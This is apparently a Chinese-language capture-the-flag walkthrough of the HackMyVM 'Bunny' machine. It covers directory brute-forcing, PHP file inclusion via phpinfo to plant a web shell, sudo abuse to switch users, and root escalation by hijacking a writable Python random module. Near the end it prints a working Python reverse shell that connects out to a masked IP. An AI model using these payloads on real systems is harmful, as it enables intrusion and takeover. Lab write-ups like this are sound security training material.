hackmyvm-buny walkthrough

難度(作者評價(jià))：difficult

信息收集

PORT STATE SERVICE 22/tcp open ssh 80/tcp open http

獲取shell

端口信息很少，常規(guī)操作，訪問80，爆破目錄。


upload.php，password.txt，config.php都是沒有實(shí)際含義的文本文件。phpinfo.php泄露了主機(jī)的相關(guān)信息。

能想到的就是index.php是不是存在ssrf。于是利用ffuf對index.php進(jìn)行參數(shù)fuzz，得到參數(shù)page為實(shí)際請求參數(shù)。

由于allow_url_include是off，所以沒有辦法進(jìn)行php://input和data協(xié)議利用。 爆破日志文件也不能被利用來進(jìn)行本地文件包含獲取shell。

同時(shí)web服務(wù)中沒有上傳點(diǎn)，于是參考文章php文件包含漏洞（利用phpinfo）復(fù)現(xiàn)^[1]，成功上傳shell。

切換用戶

為了操作方便獲取pty，反彈一個(gè)shell，查看sudo。

magic文件如下：

#/bin/bash $1 $2 $3 -T -TT 'sh #'

很簡單切換到用戶chris，得到第一個(gè)flag。

提權(quán)至root

利用pspy64可以看到root每分鐘在運(yùn)行pendu.py。
該文件沒做什么事情，但是引入了random。


從圖中可以看到random是可以修改的。于是將random改成一個(gè)反彈shell。

chris@bunny:~$ cat /usr/lib/python3.7/random.py cat /usr/lib/python3.7/random.py import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("*.*.*.*",5555)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])

成功獲取root權(quán)限。

參考

https://www.cnblogs.com/xiaoqiyue/p/10158702.html

總結(jié)

以上是生活随笔為你收集整理的hackmyvm-bunny walkthrough的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。